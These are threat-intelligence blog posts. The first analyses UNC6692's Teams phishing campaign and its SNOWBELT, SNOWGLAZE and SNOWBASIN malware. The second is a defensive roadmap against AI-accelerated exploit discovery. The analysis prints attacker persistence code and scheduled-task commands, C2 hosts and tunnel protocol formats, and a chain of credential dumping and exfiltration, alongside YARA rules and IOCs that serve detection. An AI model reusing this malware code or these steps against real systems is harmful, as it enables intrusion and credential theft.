Normal view

Snow Flurries: How UNC6692 Employed Social Engineering to Deploy a Custom Malware Suite

23 April 2026 at 16:00

Written by: JP Glab, Tufail Ahmed, Josh Kelley, Muhammad Umair


Introduction 

Google Threat Intelligence Group (GTIG) identified a multistage intrusion campaign by a newly tracked threat group, UNC6692, that leveraged persistent social engineering, a custom modular malware suite, and deft pivoting inside the victim’s environment to achieve deep network penetration. 

As with many other intrusions in recent years, UNC6692 relied heavily on impersonating IT helpdesk employees, convincing their victim to accept a Microsoft Teams chat invitation from an account outside their organization. The UNC6692 campaign demonstrates an interesting evolution in tactics, particularly the use of social engineering, custom malware, and a malicious browser extension, playing on the victim’s inherent trust in several different enterprise software providers. 

Threat Details

In late December 2025, UNC6692 conducted a large email campaign designed to overwhelm the target with messages, creating a sense of urgency and distraction. Following this, the attacker sent a phishing message via Microsoft Teams, posing as helpdesk personnel offering assistance with the email volume.

Infection Chain

The victim was contacted through Microsoft Teams and was prompted to click a link to install a local patch that prevents email spamming. Once clicked, the user’s browser opened an HTML page and ultimately downloaded a renamed AutoHotKey binary and an AutoHotkey script, sharing the same name, from a threat actor-controlled AWS S3 bucket.

"url": "https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com",
"description": "Microsoft Spam Filter Updates | Install the local patch to protect your account from email spamming",

Figure 1: Snippet from MS Team Logs

If the AutoHotkey binary is named the same as a script file in its current directory, AutoHotkey will automatically run the script with no additional command line arguments. Evidence of AutoHotKey execution was recorded immediately following the downloads resulting in initial reconnaissance commands and the installation of SNOWBELT, a malicious Chromium browser extension (not distributed through the Chrome Web Store). Mandiant was unable to recover the initial AutoHotKey script. 

The persistence of SNOWBELT was established in multiple ways. First, a shortcut to an AutoHotKey script was added to the Windows Startup folder, which verified SNOWBELT was running and that a Scheduled Task was present.

if !CheckHeadlessEdge(){
   try{
      taskService:=ComObject("Schedule.Service")
      taskService.Connect()
      rootFolder:=taskService.GetFolder("\")
      if FindAndRunTask(rootFolder){
         Sleep 10000
         if CheckHeadlessEdge(){
         ExitApp
         }
      }
   }
   Run 'cmd /c start "" "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\System Data" --headless=new --load-extension="%LOCALAPPDATA%\Microsoft\Edge\Extension Data\SysEvents" --no-first-run',,"Hide"
}
ExitApp

Figure 2: Snippet from AutoHotKey script to verify SNOWBELT was running and to start it if not

Second, two additional scheduled tasks were installed. One task to start a windowless Microsoft Edge process that loads the SNOWBELT extension and another to identify and terminate Microsoft Edge processes that do not have CoreUIComponents.dll loaded.

<Exec>
    <Command>
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    </Command>
    <Arguments>
       --user-data-dir="C:\Users\<redacted>\AppData\Local\Microsoft\Edge\System Data"  
       --no-first-run   
       --load-extension="C:\Users\<redacted>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents"   
       --headless=new --disable-sync
    </Arguments>
</Exec>

Figure 3: Snippet from the scheduled task to start the SNOWBELT extension windowless Microsoft Edge

Microsoft Edge processes without CoreUIComponents.dll are typically headless. The threat actor uses this command to essentially “clean up” headless Edge processes that execute their malware.

<Exec>
    <Command>cmd</Command>
    <Arguments>
    /c "for /f "tokens=2" %p in ('tasklist /M SHELL32.dll ^| findstr "msedge.exe"') do @(tasklist /M CoreUIComponents.dll | findstr "%p" >nul || taskkill /F /PID %p)"
    </Arguments>
</Exec>

Figure 4: Snippet from the scheduled task to check for CoreUIComponents.dll

Using the SNOWBELT extension, UNC6692 downloaded additional files including SNOWGLAZE, SNOWBASIN, AutoHotkey scripts, and a ZIP archive containing a portable Python executable and required libraries.

Internal Recon and Lateral Movement

After gaining initial access, process execution telemetry recorded UNC6692 using a Python script to scan the local network for ports 135, 445, and 3389. Following internal port scanning, the threat actor established a Sysinternals PsExec session to the victims system via the SNOWGLAZE tunnel, and executed commands to enumerate local administrator accounts. Using the local administrator account, the threat actor initiated an RDP session via the SNOWGLAZE tunnel from the victim system to a backup server. Though not directly observed, the threat actor may have acquired the local administrator accounts credentials via multiple attack paths such as authenticated Server Message Block (SMB) share enumeration.

Escalate Privileges

After gaining access to the backup server the threat actor utilized the local administrator account to extract the system's LSASS process memory with Windows Task Manager. Microsoft Windows Local Security Authority Subsystem Service (LSASS) process lsass.exe enforces security policy and contains usernames, passwords and hashes for accounts that have accessed the system. After extracting the process memory, UNC6692 exfiltrated it via LimeWire. With the process memory out of the victim environment UNC6692 is able to use offensive security tools to extract the credentials while not having to worry about being detected. 

Complete Mission

Now armed with the password hashes of elevated users, UNC6692 used Pass-The-Hash to move laterally to the network's domain controllers. Pass-The-Hash is a common technique used by threat actors where the NTLM hash is passed to another system, instead of providing the account password, allowing for authentication via NTLM. Once authenticated to the Domain Controller, the threat actor opened Microsoft Edge, and downloaded a ZIP archive containing FTK Imager to the Domain Administrator’s \Downloads folder. The threat actor executed FTK Imager and mounted the local storage drive. Subsequently, FTK Imager wrote the Active Directory database file (NTDS.dit), Security Account Manager (SAM) , SYSTEM, and SECURITY registry hives to the \Downloads folder. The extracted files were then exfiltrated from the network via LimeWire. Finally, EDR telemetry logged the threat actor performing screen captures on the Domain Controllers, specifically targeting in-focus instances of Microsoft Edge and FTK Imager.

UNC6692 attack lifecycle

Figure 5: UNC6692 attack lifecycle

THE SNOW Ecosystem

Phishing Landing Page

The original phishing link (https://service-page-25144-30466-outlook.s3.us-west-2.amazonaws.com/update.html?email=<redacted>.com) delivered via Microsoft Teams directs the victim to a landing page masquerading as a "Mailbox Repair Utility." This interface is designed to elicit user engagement through various on-screen buttons.

The landing page masquerading as an official "Mailbox Repair and Sync Utility v2.1.5."

Figure 6: The landing page masquerading as an official "Mailbox Repair and Sync Utility v2.1.5."

Phase 1: Environment Enforcement and Anti-Analysis

The attacker used a gatekeeper script designed to ensure the payload is delivered only to intended targets while evading automated security sandboxes. Upon loading, the landing page executes an init() function that inspects the URL for a mandatory ?email= parameter. If this parameter is absent, the page immediately redirects to about:blank. 

The script also checks the victim’s browser. If the user is not using Microsoft Edge, the page displays a persistent overlay warning. This forces the user to click an "Open in Edge" button, which triggers the microsoft-edge: URI scheme. This ensures the victim is moved from potentially secure mobile or third-party browser environments into a specific workspace where the attacker’s exploits are most effective.

Phase 2: Credential Harvesting via Social Engineering

Once the environment is established, the page presents a professional-looking "Configuration Management Panel" masquerading as an official "Mailbox Repair and Sync Utility." The primary hook is a "Health Check" button that, when clicked, triggers an "Authentication Required" modal.

The harvesting script, handleAuthFormSubmit, employs a "double-entry" psychological trick. It is programmed to reject the first and second password attempt as incorrect. This serves two functions: it reinforces the user’s belief that the system is legitimate and performs real-time validation, and it ensures that the attacker captures the password twice, significantly reducing the risk of a typo in the stolen data. A screenshot of authentication is shown in Figure 7, and the email supplied is entered by default.

The credential harvesting prompt triggered by the "Health Check" button

Figure 7: The credential harvesting prompt triggered by the "Health Check" button

Phase 3: Data Exfiltration and Distraction Sequences

Upon successful submission, the script executes an asynchronous PUT request using AWS URLs. The validated credentials and metadata are uploaded directly to an attacker-controlled Amazon S3 bucket (e.g., service-page-18968-2419-outlook.s3.us-west-2.amazonaws.com), which have since been taken down. These buckets serve as the command and control (C2) infrastructure and represent critical indicators of compromise (IOCs).

To mask this background activity and prevent user suspicion, the script initiates a startProgressBar function. This displays a scripted distraction sequence featuring fake technical tasks such as "Parsing configuration data" and "Checking mailbox integrity." This manipulation keeps the victim engaged until the data transfer is complete.

A scripted distraction sequence used to mask the background exfiltration of stolen data

Figure 8: A scripted distraction sequence used to mask the background exfiltration of stolen data

Phase 4: Malware Staging and Endpoint Foothold

The final stage involves the delivery of secondary malicious payloads referenced within the CONFIG object of the script. While the progress bar runs, the site is prepared to deliver files seen in Table 1.

Button Clicked

File Downloaded

Type / Risk

Profile 1.3

Protected.ahk

AutoHotKey Script: Not found during the investigation, but suspected to install SNOWBELT.

Profile B5

profileB5.txt

Likely a configuration file for the malware.

Component Verification

RegSrvc.exe

AutoHotKey Executable: Masquerading as a "Registration Service."

Health Check

N/A

Prompts the user to input email credentials. Exfiltrates the credentials to Amazon S3 bucket.

Table 1: Buttons on the landing page

By the time the user receives a "Configuration completed successfully" message, the attacker has secured the credentials and potentially established a persistent foothold on the endpoint using these staged files.

The SNOW malware ecosystem, attributed to the threat cluster UNC6692, operates as a modular ecosystem comprising three primary components: SNOWBELT, SNOWGLAZE, and SNOWBASIN. Rather than functioning as isolated tools, these components form a coordinated pipeline that facilitates an attacker's journey from initial browser-based access to the internal network of the organization.

The SNOW ecosystem

Figure 9: The SNOW ecosystem

1.SNOWBELT (Browser Extension)

SNOWBELT serves as the initial foothold and the primary "eyes" of the operation. It is a JavaScript-based backdoor delivered as a Chromium browser extension, often masquerading under names like "MS Heartbeat" or "System Heartbeat".  Rather than being available through the Chrome Web Store, the extension is deployed through social engineering tactics.

  • Role: It is designed to intercept commands and send them to SNOWBASIN for execution . It maintains persistence via the browser's extension registration system and uses Service Worker Alarms and Keep-Alive Tab Injection (via helper.html) to ensure it remains active whenever the browser is running.

  • Functionality: By relaying commands from the threat actor to SNOWBASIN, SNOWBELT provides authenticated access to the environment. This allows the attacker to move laterally and escalate privileges without the need for constant re-authentication.

2.SNOWGLAZE (Python Tunneler)

Once a foothold is established, SNOWGLAZE is deployed to manage the logistics of external communication. SNOWGLAZE is a Python-based tunneler that can operate in both Windows and Linux environments.

  • Role: Its primary function is to create a secure, authenticated WebSocket tunnel between the victim's internal network and the attacker's command-and-control (C2) infrastructure, such as a Heroku subdomain. It facilitates SOCKS proxy operations, allowing arbitrary TCP traffic to be routed through the infected host.

  • Functionality: SNOWGLAZE masks malicious traffic by wrapping data in JSON objects and Base64 encoding it for transfer via WebSockets. This makes the activity appear as standard encrypted web traffic. When attackers wish to interact with backdoors like SNOWBASIN or exfiltrate staged data, traffic is routed through this established tunnel.

3.SNOWBASIN (Python Bindshell)

While SNOWBELT monitors the user and SNOWGLAZE bridges the network gap, SNOWBASIN provides the functional interactive control over the infected system.

  • Role: It acts as a persistent backdoor that operates as a local HTTP server (typically listening on port 8000). It enables remote command execution via cmd.exe or powershell.exe, screenshot capture, and data staging for exfiltration.

  • Functionality: This component is where active reconnaissance and mission completion occur. Attacker commands (such as whoami or net user) are sent through the SNOWGLAZE tunnel, intercepted by the SNOWBELT extension, and then proxied to the SNOWBASIN local server via HTTP POST requests. SNOWBASIN executes these commands and relays the results back through the same pipeline to the attacker.

Malware Analysis 

SNOWBELT

SNOWBELT is a JavaScript-based backdoor implemented as a Chromium browser extension. Its lifecycle begins with the execution of the background.js Service Worker upon installation, which leverages the browser's extension registration system for persistence. To ensure continuous operation while the browser is active, the malware utilizes Service Worker Alarms (agent-heartbeat) and Keep-Alive Tab Injection (helper.html).

Upon initialization, the malware generates a unique identity using the prefix fp-sw- followed by a UUID. It then employs a time-based DGA to calculate C2 URLs. Using a hard-coded seed value (691f7258f212fa8908a8bf06bcf9e027d2177276e13e10ff56bd434ff3755cc4), it generates a registry URL for an S3 bucket within 30-minute time slots. These URLs follow a specific structural pattern:

  • https://[a-f0-9]{24}-[0-9]{6,7}-{0-9}{1}.s3.us-east-2.amazonaws[.]com

The manifest retrieved from this registry is decrypted via AES-GCM using a key derived from SHA256(SEED + "|" + timeslot).

For low-latency C2, SNOWBELT registers with the browser's Push Notification service. This is achieved using a hard-coded VAPID Public Key:

BJkWCT45mL0uvV3AssRaq9Gn7iE2N7Lx38ZmWDFCjwhz0zv0QSVhKuZBLTTgAijB12cgzMzqyiJZr5tokRzSJu0

This setup provides an asynchronous channel that allows attackers to "wake up" the Service Worker immediately via authenticated Push messages, bypassing standard polling. Additionally, the malware supports real-time interaction through a persistent REGISTRY_WEBSOCKET_URL connection.

SNOWBELT functions in coordination with SNOWBASIN, a backdoor acting as a local web server (typically on port 8000). It relays decrypted C2 commands—such as command, buffer, flush, and commit—to SNOWBASIN via HTTP POST requests, effectively proxying shell commands to the host system.

The malware also includes mechanisms to bypass the browser sandbox:

  1. Native Host Bridge (open_native_messaging): Uses chrome.runtime.connectNative to establish I/O pipes with local applications for issuing privileged commands.

  2. Protocol Handler Abuse (open_uri): Employs dream.html and dream.js to trigger custom URI schemes in new tabs, targeting vulnerabilities in third-party desktop applications.

Exfiltration is managed by the sendJsonDataToS3 function, which encrypts data with AES-GCM (Key: SHA256(SEED + "|ping|" + bucket + "|" + objectKey)) before uploading to S3. The backdoor's command set is summarized in Table 2.

Command Type

Description

command

Relayed: Decrypts and POSTs command text to SNOWBASIN; exfiltrates response to C2.

buffer

Relayed: Forwards file path payloads to local buffer endpoint.

flush

Relayed: Triggers a data flush on the local server.

commit

Relayed: Sends URL and path data for local processing.

stop_server

Relayed: Shutdown signal for the local SNOWBASIN instance.

screenshot

Relayed: Requests a screen capture from the host.

payload

Internal: Downloads files using chrome.downloads; supports URLs and base64 blobs.

open_native_messaging

Internal: Direct connection to native host apps via Chrome APIs.

open_uri

Internal: Triggers external protocol handlers via helper pages.

delete_cache

Internal: Removes downloaded files from the system.

websocket_control

Internal: Controls the state of WebSocket connectivity.

ping

Internal: Provides heartbeats and status updates to the C2.

Table 2: SNOWBELT commands

Finally, SNOWBELT implements a feedback loop by monitoring chrome.downloads.onChanged. If a download is blocked (e.g., FILE_VIRUS_INFECTED), the malware reports the error back to the S3-based C2.

SNOWBASIN 

SNOWBASIN is a Python-based backdoor that operates as a local HTTP server on ports 8000, 8001, or 8002. Its core capabilities include command execution, screenshot capture, and data exfiltration. The malware also enables operators to manage files by downloading or deleting them, and it provides the capability to terminate active connections. SNOWBELT relays commands to this malware by sending HTTP requests to localhost:8000.

It turns the victim's computer into a command-and-control (C2) node that can be controlled via HTTP requests. It is designed to run on Windows (evidenced by os.chdir('C:\\') and cmd.exe calls) and allows a remote actor to execute commands, steal files, and take screenshots.

Endpoint

Function

Description

/stream

Remote Shell

Receives a command and executes it via cmd.exe or powershell.exe. It returns the STDOUT/STDERR results to the attacker.

/buffer

File Exfiltration

If a file path is provided, it reads the file, encodes it in Base64, and sends it back. If a folder is provided, it returns a full directory listing

/flush

File Deletion

Relayed. Signals http://localhost[:]8000/flush to flush buffered data.

/commit

File Ingress

Downloads a file from a provided URL and saves it to a specific path on the local disk. It bypasses SSL certificate verification (CERT_NONE).

/capture

Take Screenshots

Uses the mss and PIL libraries to take a screenshot of all monitors and send the image back as a Base64 string.

/gc

Self-Termination

Shuts down the server instance, effectively ""killing"" the backdoor's connection.

Table 3: SNOWBASIN endpoints
SNOWGLAZE

The network tunneler SNOWGLAZE, developed in Python, facilitates the routing of arbitrary TCP traffic through a compromised system by establishing a WebSocket connection to a static C2 host using hard-coded credentials.

The script is designed for cross-platform execution on both Windows and Linux, utilizing environment-specific behaviors for each. In Windows environments, it runs as a foreground process manageable via standard keyboard interrupts (Ctrl-C). Conversely, on Linux, it operates as a background daemon and includes specific logic to handle SIGINT and SIGTERM signals for orderly shutdowns.

To establish communication, the malware targets the C2 server at wss://sad4w7h913-b4a57f9c36eb[.]herokuapp[.]com:443/ws, masquerading its traffic with a Microsoft Edge User-Agent string. If the initial connection fails, the script employs an incremental backoff strategy, starting at 5 seconds and increasing by 5-second intervals up to a 300-second maximum. Upon a successful WebSocket handshake, it transmits the following Auth payload:

{
    "type": "auth",
    "login": "<redacted",
    "password": "<redacted",
    "uuid": "<redacted>"
}

Following authentication, the script sends a "register" type message with no payload, followed by an "agent_info" JSON record. Although the "info" field within this record is intended to carry the public IP address, it remains unpopulated due to improper implementation in the script.

Once fully connected, the malware listens for JSON-formatted commands. The supported "type" values include:

  • ping

    • Prompts the script to return a "type": "pong" JSON object.

  • agent_public_ip

    • Intended to report the host's public IP via an agent_info structure; however, the IP field is consistently blank in current versions.

  • socks_connect

    • Requests a new SOCKS proxy connection using a unique conn_id provided by the operator to track the session. The request format is as follows:

{
    "type": "socks_connect",
    "conn_id": "<unique_connection_id>",
    "target_host": "example.com",
    "target_port": 80
}
    • Execution triggers an asynchronous worker thread that manages the TCP-to-WebSocket data transfer, utilizing Base64 encoding and JSON encapsulation with the socks_data type.

  • socks_data

    • Facilitates bidirectional data exchange between the WebSocket and the TCP socket. Data is Base64-encoded within the data field of the following structure:

    {
        "type": "socks_data",
        "conn_id": "<unique_connection_id>",
        "data": "bG9yZW0gaXBzdW0=" 
    }
  • socks_close

    • Terminates the specific proxy stream identified by the given conn_id.

  • disconnect

    • Serves all active proxy connections and terminates script execution.

Outlook & Implications

The UNC6692 campaign demonstrates how modern attackers blend social engineering and technical evasion to gain a foothold into environments. A critical element of this strategy is the systematic abuse of legitimate cloud services for payload delivery and exfiltration, and for command-and-control (C2) infrastructure. By hosting malicious components on trusted cloud platforms, attackers can often bypass traditional network reputation filters and blend into the high volume of legitimate cloud traffic. 

This "living off the cloud" strategy allows attackers to blend malicious operations into a high volume of encrypted, reputably sourced traffic, making detection based on domain reputation or IP blocking increasingly ineffective. Defenders must now look beyond process monitoring to gain clear visibility into browser activity and unauthorized cloud traffic. As threat actors continue to professionalize these modular, cross-platform methodologies, the ability to correlate disparate events across the browser, local Python environments, and cloud egress points will be critical for early detection.

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.

Network Indicators

Indicator

Description

service-page-25144-30466-outlook.s3.us-west-2.amazonaws[.]com

Hosted the phishing site and initial AutoHotKey payloads

cloudfront-021.s3.us-west-2.amazonaws[.]com

SNOWBELT C2

wss://sad4w7h913-b4a57f9c36eb.herokuapp[.]com/ws

Hard-coded WebSocket Secure URL within SNOWGLAZE

service-page-11369-28315-outlook[.]s3[.]us-west-2[.]amazonaws[.]com

Domain for URL used to upload a text file

File Indicators

File Name

Description

SHA-256 Hash

C:\ProgramData\log

SNOWGLAZE

2fa987b9ed6ec6d09c7451abd994249dfaba1c5a7da1c22b8407c461e62f7e49

C:\ProgramData\log

SNOWBASIN

c8940de8cb917abe158a826a1d08f1083af517351d01642e6c7f324d0bba1eb8

C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\background.js

SNOWBELT Service worker

7f1d71e1e079f3244a69205588d504ed830d4c473747bb1b5c520634cc5a2477

C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\dream.js

SNOWBELT JS resource

ca390b86793922555c84abc3b34406da2899382c617f9dcf83a74ac09dd18190

C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\dream.html

SNOWBELT HTML resource

6e6dab993f99505646051d2772701e3c4740096ff9be63c92713bcb7fcddf9f7

C:\Users\<user>\AppData\Local\Microsoft\Edge\Extension Data\SysEvents\helper.html

SNOWBELT HTML resource

de200b79ad2bd9db37baeba5e4d183498d450494c71c8929433681e848c3807f

YARA Rules

SNOWGLAZE
rule G_Tunneler_SNOWGLAZE_1 {
  meta:
   author = "Google Threat Intelligence Group (GTIG)"
   platforms = "Windows, Linux"

  strings:
    $r1 = /\.connect\(\s{0,25}WS_PROXY_URL/
    $r2 = /"data":\s{0,1}base64\.b64encode\(\w{1,10}\)\.decode\('ascii'\)/
    $r3 = /"type":\s{0,1}"socks_data"/
    $r4 = /await\s{0,1}reader\.read\(\d{2,4}\)/
    $r5 = /"login":\s{0,1}AGENT_LOGIN/
    $r6 = /"password":\s{0,1}AGENT_PASSWORD/
    $r7 = /"uuid":\s{0,1}AGENT_UUID/
    
    $s1 = ".socks_tcp_to_ws"

  condition:
    5 of ($r*)
    and $s1
}
SNOWBELT
rule G_Backdoor_SNOWBELT_1 {
    meta:
        author = "Google Threat Intelligence Group (GTIG)"
        platform = "Windows"
    
	strings:
		$str1 = ".importKey(\"raw\",keyMaterial,\"AES-GCM\",!1,[\"decrypt\"])"
		$str2 = ".importKey(\"raw\",keyMaterial,\"AES-GCM\",!1,[\"encrypt\"])"
		$str3 = "sendJsonDataToS3"
		$str4 = "processCommand"
		$str5 = "\"screenshot\"===cmdType"
		$str6 = "\"payload\"===cmdType"
		$str7 = "\"websocket_control\"===cmdType"
		$str8 = "\"open_uri\"===cmdType"
		$str9 = "\"delete_cache\"===cmdType"
		$str10 = "\"payload_download_complete\""
		$str11 = ".s3.us-east-2.amazonaws.com/"
	condition:
		all of them
          
}
SNOWBASIN
rule G_Backdoor_SNOWBASIN_1 {
  meta:
    author = "Google Threat Intelligence Group (GTIG)"
    platform = "Windows"

  strings:
    $path1 = "self.path == '/probe':"
    $path2 = "self.path == '/stream':"
    $path3 = "self.path == '/buffer':"
    $path4 = "self.path == '/flush':"
    $path5 = "self.path == '/commit':"
    $path6 = "self.path == '/capture':"
    $path7 = "self.path == '/gc':"

    $func1 = "self.handle_stream("
    $func2 = "self.handle_buffer("
    $func3 = "self.handle_flush("
    $func4 = "self.handle_commit("

    $s1 = "self.wfile.write(info_msg"
    $s2 = "selected_port), WebServerHandler) as httpd:"
    $s3 = "ThreadedTCPServer(socketserver.ThreadingMixIn"
    $s4 = "httpd.serve_forever()"


  condition:
    filesize<1MB and (
      (all of ($s*) and 6 of ($path*, $func*)) or
      (8 of ($path*, $func*)) or
      10 of them
    )
}

MITRE ATT&CK

Tactic

Techniques

Initial Access

T1566.002: Spearphishing Link

Execution

T1053: Scheduled Task/Job

T1053.005: Scheduled Task

T1059: Command and Scripting Interpreter

T1059.001: PowerShell

T1059.003: Windows Command Shell

T1059.006: Python

T1059.007: JavaScript

T1059.010: AutoHotKey & AutoIT

T1204.001: Malicious Link

T1204.002: Malicious File

T1559: Inter-Process Communication

T1569.002: Service Execution

Persistence

T1176.001: Browser Extensions

T1543: Create or Modify System Process

T1543.003: Windows Service

T1547.001: Registry Run Keys / Startup Folder

T1547.009: Shortcut Modification

Privilege Escalation

T1068: Exploitation for Privilege Escalation

Defense Evasion

T1027: Obfuscated Files or Information

T1027.010: Command Obfuscation

T1027.015: Compression

T1036.005: Match Legitimate Resource Name or Location

T1055: Process Injection

T1070.004: File Deletion

T1112: Modify Registry

T1134: Access Token Manipulation

T1134.001: Token Impersonation/Theft

T1140: Deobfuscate/Decode Files or Information

T1202: Indirect Command Execution

T1562.001: Disable or Modify Tools

T1564.001: Hidden Files and Directories

T1622: Debugger Evasion

Credential Access

T1003.001: LSASS Memory

T1003.002: Security Account Manager

T1003.003: NTDS

T1110.001: Password Guessing

T1110.003: Password Spraying

T1552.001: Credentials In Files

Discovery

T1007: System Service Discovery

T1012: Query Registry

T1016: System Network Configuration Discovery

T1018: Remote System Discovery

T1033: System Owner/User Discovery

T1046: Network Service Discovery

T1057: Process Discovery

T1082: System Information Discovery

T1083: File and Directory Discovery

T1087.001: Local Account

T1518: Software Discovery

Lateral Movement

T1021.001: Remote Desktop Protocol

T1021.002: SMB/Windows Admin Shares

Collection

T1005: Data from Local System

T1074: Data Staged

T1113: Screen Capture

T1560: Archive Collected Data

T1560.001: Archive via Utility

Exfiltration

T1020: Automated Exfiltration

T1567: Exfiltration Over Web Service

T1567.002: Exfiltration to Cloud Storage

Command and Control

T1071.001: Web Protocols

T1090: Proxy

T1105: Ingress Tool Transfer

T1572: Protocol Tunneling

Impact

T1489: Service Stop

Resource Development

T1608.002: Upload Tool

T1608.005: Link Target

Acknowledgements

This analysis would not have been possible without the assistance from several individuals within Mandiant Consulting, Google Threat Intelligence Group and FLARE who helped with analysis and reviewing this blog post. We also appreciate Amazon for their collaboration against this threat.

Defending Your Enterprise When AI Models Can Find Vulnerabilities Faster Than Ever

16 April 2026 at 16:00

Introduction 

Advances in AI model-powered exploitation have demonstrated that general-purpose AI models can excel at vulnerability discovery, even without being purpose-built for the task. Eventually, capabilities such as these will be integrated directly into the development cycle, and code will be more difficult to exploit than ever; however, this transition creates a critical window of risk. As we harden existing software with AI, threat actors will use it to discover and exploit novel vulnerabilities.

Faced with this scenario, defenders have two critical tasks: hardening the software we use as rapidly as possible, and preparing to defend systems that have not yet been hardened.

As noted in Wiz’s blog post, Claude Mythos: Preparing for a World Where AI Finds and Exploits Vulnerabilities Faster Than Ever, now is the time to strengthen playbooks, reduce exposure, and incorporate AI into security programs. The following blog provides an overview of the evolving attack lifecycle, how threat actors will weaponize these capabilities, and a roadmap for modernizing enterprise defensive strategies.

aside_block
<ListValue: [StructValue([('title', 'Webinar: Defending Your Enterprise When AI Models Can Find Vulnerabilities Faster Than Ever'), ('body', <wagtail.rich_text.RichText object at 0x7f65bba10fd0>), ('btn_text', 'Register now'), ('href', 'https://www.brighttalk.com/webcast/18282/666651?utm_source=gcs-blog&utm_medium=blog&utm_campaign=mythos'), ('image', None)])]>

Exploits in the Adversary Lifecycle

Historically, the discovery of novel vulnerabilities and the subsequent development of zero-day exploits required significant time, specialized human expertise, and resources. Today, highly capable AI models are increasingly demonstrating the ability to not only identify vulnerabilities but also help generate functional exploits, lowering the barrier to entry for threat actors. Continued advancements in these capabilities will increasingly make exploit development achievable for threat actors of all skill levels, significantly compressing the attack timeline. GTIG has already observed threat actors leveraging LLMs for this purpose as well as the marketing of this capability within AI tools and services advertised in underground forums.

A significant shift in the economics of zero-day exploitation will enable mass exploitation campaigns, ransomware and extortion operations, and an increased volume of activity from actors who previously guarded these capabilities and used them sparingly.

Accelerated exploit deployment is a trend we’ve already been observing among advanced adversaries. In our 2025 Zero-Days in Review report, we noted that PRC-nexus espionage operators have become increasingly adept at rapidly developing and distributing exploits among otherwise separate threat groups. This has significantly shrunk the historical gap between public vulnerability disclosure and widespread mass exploitation, a trend we expect to continue.

This evolving landscape will almost certainly result in meaningful shifts over the coming year:

shifts in evolving landscape

Scaling Defenses for Machine-Speed Threats

We have long anticipated that AI models would become capable of vulnerability discovery—which is why we’ve been using AI tools like Big Sleep, CodeMender, and OSS-Fuzz to proactively find and fix vulnerabilities over the years.

Now as threat actors leverage AI to significantly multiply their offensive output, enterprise defenders cannot rely on human-speed patching protocols to keep up. When organizations are confronted with an AI-enabled surge in vulnerabilities, traditional security tooling and manual triage will fail to keep pace.

Attempting to absorb this exponential increase in workload using legacy processes will result in severe overload and burnout for security and development teams. The question is no longer just about proactive scanning and adherence to traditional patching SLAs; it is about whether organizations are empowering their workforce with the automation needed to eliminate manual toil. To prepare for this reality, organizations must integrate AI defensively, shifting the role of the security practitioner from manual investigator to strategic coordinator.

A Modern, AI-Integrated Defensive Roadmap

In order to modernize the traditional vulnerability roadmap, organizations must incorporate automation and prioritize resilience. 

Organizations are no longer defending against purely human-speed exploitation. AI-enabled adversaries can identify, chain, and weaponize weaknesses faster than traditional vulnerability management programs were designed to respond. A modern roadmap should therefore emphasize automation, resilience, and continuous validation.

This roadmap is organized in two parts. The first outlines advanced modernization priorities for organizations that are ready to evolve their security programs to achieve defense at AI enabled speeds. The second provides foundational guidance for organizations that are still building core vulnerability management capabilities.

Advanced Modernization Priorities

modern defensive roadmap
Secure Your Code 

Organizations have historically focused on patching and securing tangible assets like laptops, servers, and network infrastructure. In today’s threat landscape, that same discipline must be applied to source code, code libraries, and the systems used to build and deploy it.

Code repository platforms should be tightly protected and accessible only through trusted internal networks, managed identities, or other strongly controlled access paths. Organizations should proactively scan for secrets within their codebase that may be weaponized by adversaries and eliminate any practice of storing sensitive credentials in plaintext.

Similarly, organizations are still accountable for vulnerable code from their supply chains, and they must proactively plan for and defend against attacks through exploitation of compromised code libraries. This creates a conflict with updating versions and repositories immediately against holding onto known and trusted versions.

Accordingly, security controls should cover build runners, CI/CD pipelines, and other automated execution mechanisms, which are increasingly attractive targets for threat actors. AI-enabled scanning tools can help teams detect critical vulnerabilities faster and uncover groups of weaknesses that may appear minor on their own but could be chained together for exploitation. 

Organizations should leverage frameworks like Wiz SITF to map their SDLC threat model and identify "attack chains" where minor, isolated weaknesses are combined by AI to create a critical breach. Additionally, one-time static or dynamic scanning is no longer sufficient. Organizations should deploy emerging commercial and open-source agentic solutions to review code and mitigate flaws before they can be exploited. 

Move to Automated Security Operations

Traditional dashboards and static detection rules will struggle under the volume of automated attacks. Security operations need to become more dynamic, with a clear path toward an agentic SOC.

Legacy models are often reactive and constrained by manual workflows, By deploying specialized AI agents such as Google Cloud’s Triage and Investigation Agent and Gemini in Google Security Operations, teams can automate alert triage, analyze suspicious code without manual reverse engineering, correlate signals across multiple tools, and generate response playbooks in real time. This allows analysts to spend less time on repetitive investigation and more time on high-value decisions, helping the SOC respond to AI-enabled attacks at AI speed.

Reduce Attack Surface 

Organizations should design networks with a zero trust approach and focus first on reducing exposure across internet-facing systems, critical infrastructure, control planes, and trusted service infrastructure. 

Network segmentation and identity-based access controls should be in place so that if an edge device is compromised through a zero-day exploit, the blast radius is limited and easier to contain.

Maintain Continuous Asset Discovery and Posture Management

Unidentified assets are a major blindspot for organizations and a critical weakness that AI-enabled threat actors are able to exploit with increasing efficiency. Static spreadsheets and manual asset tracking are no longer a viable and scalable strategy.

Security teams need a continuously updated, automated inventory covering endpoints, servers, public-facing systems, network infrastructure, AI systems, cloud environments and ephemeral assets like Kubernetes pods. Dynamic asset discovery is critical for reducing blind spots and shadow AI. The more seamlessly known assets can be fed into downstream security tooling, the more accurate and effective frontline detection and response will be.

Expand Automated Scanning Coverage

Automated vulnerability scanning should cover every major operating system in use, including Windows, macOS, and Linux, across both endpoints and servers.

Reduce blind spots and maintain continuous, comprehensive visibility into vulnerabilities. Where possible, that visibility should feed directly into automated remediation pipelines.

Enhance Network Device Patching and Limit Connectivity

Organizations need a highly automated, repeatable process for identifying missing firmware and security updates on network devices and for scheduling maintenance efficiently. Network infrastructure has long been a preferred target for sophisticated threat actors, and AI will only accelerate the discovery of weaknesses in these often-overlooked systems.

